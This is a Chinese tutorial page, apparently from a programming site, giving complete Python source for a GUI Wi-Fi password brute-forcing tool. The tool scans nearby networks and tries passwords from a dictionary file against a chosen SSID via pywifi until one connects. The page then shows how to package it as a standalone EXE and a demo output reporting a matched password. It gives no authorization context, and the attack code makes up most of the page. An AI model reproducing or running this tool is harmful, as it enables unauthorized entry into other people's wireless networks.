文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

如何用python暴力破解wifi密码EXE应用

2023-07-04 11:23

关注

本篇内容介绍了“如何用python暴力破解wifi密码EXE应用”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!

前置准备-依赖库

示例:使用pycharm ide 安装pywifi

如何用python暴力破解wifi密码EXE应用
当然你也可以直接使用pip install xxx 命令进行安装

Python tkinter编写GUI界面

本文使用TKinter实现GUI界面,自己写界面比较麻烦,可以使用一些可视化的工具(比如QT5)进行快速编排实现GUI代码自动化。

密码字典

密码字典是什么?
简单的说就是一个提前存放一系列密码的文本,里面全是数字、数字与字母的组合、手机号、座机号、生日等等。

本文测试时你可以自己手动创建密码字典;也可以下载以下密码字典库
如何用python暴力破解wifi密码EXE应用

开撸

from tkinter import *from tkinter import ttkimport pywififrom pywifi import constimport timeimport tkinter.filedialog  # 在Gui中打开文件浏览import tkinter.messagebox  # 打开tkiner的消息提醒框class MY_GUI():    def __init__(self, init_window_name):        self.init_window_name = init_window_name        # 密码文件路径        self.get_value = StringVar()  # 设置可变内容        # 获取破解wifi账号        self.get_wifi_value = StringVar()        # 获取wifi密码        self.get_wifimm_value = StringVar()        # 抓取网卡接口        self.wifi = pywifi.PyWiFi()        # 抓取第一个无线网卡        self.iface = self.wifi.interfaces()[0]        # 测试链接断开所有链接        self.iface.disconnect()        time.sleep(1)  # 休眠1秒        # 测试网卡是否属于断开状态        assert self.iface.status() in \               [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]    def __str__(self):        # 自动会调用的函数,返回自身的网卡        return '(WIFI:%s,%s)' % (self.wifi, self.iface.name())    # 设置窗口    def set_init_window(self):        self.init_window_name.title("普帝WIFI破解工具")        self.init_window_name.geometry('+500+200')        labelframe = LabelFrame(width=800, height=400, text="配置")  # 框架,以下对象都是对于labelframe中添加的        labelframe.grid(column=0, row=0, padx=10, pady=10)        self.search = Button(labelframe, text="搜索附近WiFi", command=self.scans_wifi_list).grid(column=0, row=0)        self.pojie = Button(labelframe, text="普帝金手指", command=self.readPassWord).grid(column=1, row=0)        self.label = Label(labelframe, text="目录路径:").grid(column=0, row=1)        self.path = Entry(labelframe, width=12, textvariable=self.get_value).grid(column=1, row=1)        self.file = Button(labelframe, text="添加密码文件目录", command=self.add_mm_file).grid(column=2, row=1)        self.wifi_text = Label(labelframe, text="WiFi账号:").grid(column=0, row=2)        self.wifi_input = Entry(labelframe, width=12, textvariable=self.get_wifi_value).grid(column=1, row=2)        self.wifi_mm_text = Label(labelframe, text="WiFi密码:").grid(column=2, row=2)        self.wifi_mm_input = Entry(labelframe, width=10, textvariable=self.get_wifimm_value).grid(column=3, row=2,sticky=W)        self.wifi_labelframe = LabelFrame(text="wifi列表")        self.wifi_labelframe.grid(column=0, row=3, columnspan=4, sticky=NSEW)        # 定义树形结构与滚动条        self.wifi_tree = ttk.Treeview(self.wifi_labelframe, show="headings", columns=("a", "b", "c", "d"))        self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview)        self.wifi_tree.configure(yscrollcommand=self.vbar.set)        # 表格的标题        self.wifi_tree.column("a", width=50, anchor="center")        self.wifi_tree.column("b", width=100, anchor="center")        self.wifi_tree.column("c", width=100, anchor="center")        self.wifi_tree.column("d", width=100, anchor="center")        self.wifi_tree.heading("a", text="WiFiID")        self.wifi_tree.heading("b", text="SSID")        self.wifi_tree.heading("c", text="BSSID")        self.wifi_tree.heading("d", text="signal")        self.wifi_tree.grid(row=4, column=0, sticky=NSEW)        self.wifi_tree.bind("<Double-1>", self.onDBClick)        self.vbar.grid(row=4, column=1, sticky=NS)    # 搜索wifi    def scans_wifi_list(self):  # 扫描周围wifi列表        # 开始扫描        print("^_^ 开始扫描附近wifi...")        self.iface.scan()        time.sleep(15)        # 在若干秒后获取扫描结果        scanres = self.iface.scan_results()        # 统计附近被发现的热点数量        nums = len(scanres)        print("数量: %s" % (nums))        # 实际数据        self.show_scans_wifi_list(scanres)        return scanres    # 显示wifi列表    def show_scans_wifi_list(self, scans_res):        for index, wifi_info in enumerate(scans_res):            self.wifi_tree.insert("", 'end', values=(index + 1, wifi_info.ssid, wifi_info.bssid, wifi_info.signal))    # 添加密码文件目录    def add_mm_file(self):        self.filename = tkinter.filedialog.askopenfilename()        self.get_value.set(self.filename)    # Treeview绑定事件    def onDBClick(self, event):        self.sels = event.widget.selection()        self.get_wifi_value.set(self.wifi_tree.item(self.sels, "values")[1])    # 读取密码字典,进行匹配    def readPassWord(self):        self.getFilePath = self.get_value.get()        self.get_wifissid = self.get_wifi_value.get()        pwdfilehander = open(self.getFilePath, "r", errors="ignore")        while True:            try:                self.pwdStr = pwdfilehander.readline()                if not self.pwdStr:                    break                self.bool1 = self.connect(self.pwdStr, self.get_wifissid)                if self.bool1:                    self.res = "[*] 密码正确!wifi名:%s,匹配密码:%s " % (self.get_wifissid, self.pwdStr)                    self.get_wifimm_value.set(self.pwdStr)                    tkinter.messagebox.showinfo('提示', '破解成功!!!')                    print(self.res)                    break                else:                    self.res = "[*] 密码错误!wifi名:%s,匹配密码:%s" % (self.get_wifissid, self.pwdStr)                    print(self.res)                time.sleep(3)            except:                continue    # 对wifi和密码进行匹配    def connect(self, pwd_Str, wifi_ssid):        # 创建wifi链接文件        self.profile = pywifi.Profile()        self.profile.ssid = wifi_ssid  # wifi名称        self.profile.auth = const.AUTH_ALG_OPEN  # 网卡的开放        self.profile.akm.append(const.AKM_TYPE_WPA2PSK)  # wifi加密算法        self.profile.cipher = const.CIPHER_TYPE_CCMP  # 加密单元        self.profile.key = pwd_Str  # 密码        self.iface.remove_all_network_profiles()  # 删除所有的wifi文件        self.tmp_profile = self.iface.add_network_profile(self.profile)  # 设定新的链接文件        self.iface.connect(self.tmp_profile)  # 链接        time.sleep(5)        if self.iface.status() == const.IFACE_CONNECTED:  # 判断是否连接上            isOK = True        else:            isOK = False        self.iface.disconnect()  # 断开        time.sleep(1)        # 检查断开状态        assert self.iface.status() in \               [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]        return isOKdef gui_start():    init_window = Tk()    ui = MY_GUI(init_window)    print(ui)    ui.set_init_window()    init_window.mainloop()if __name__ == "__main__":    gui_start()

打包成exe

pyinstaller -F -w -i 图标名.后缀 源文件.py

命令解释看文末解释

如何用python暴力破解wifi密码EXE应用

然后到你电脑上python安装目录下的Scripts\dist查看你打包的exe应用

如何用python暴力破解wifi密码EXE应用

演示

双击打包后的.exe脚本
如何用python暴力破解wifi密码EXE应用

STEP1: 点击搜索附件WIFI
STEP2: 添加密码文件目录
STEP3: 点击普帝金手指进行破解

如何用python暴力破解wifi密码EXE应用

^_^ 开始扫描附近wifi...数量: 19[*] 密码正确!wifi名:XXXXXXXX,匹配密码:XXXXXXXX

PS

pyinstaller打包错误解决

如出现以下错误
struct.error: unpack requires a buffer of 16 bytes
如何用python暴力破解wifi密码EXE应用

解决方法:使用在线转换ico工具来转换图片就可以了,需要转换成尺寸为16*16的
使用在线转换成ico的工具即可

pyintaller 常用打包命令解释

如何用python暴力破解wifi密码EXE应用

“如何用python暴力破解wifi密码EXE应用”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识可以关注编程网网站,小编将为大家输出更多高质量的实用文章!

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     807人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     351人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     314人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     433人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     221人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯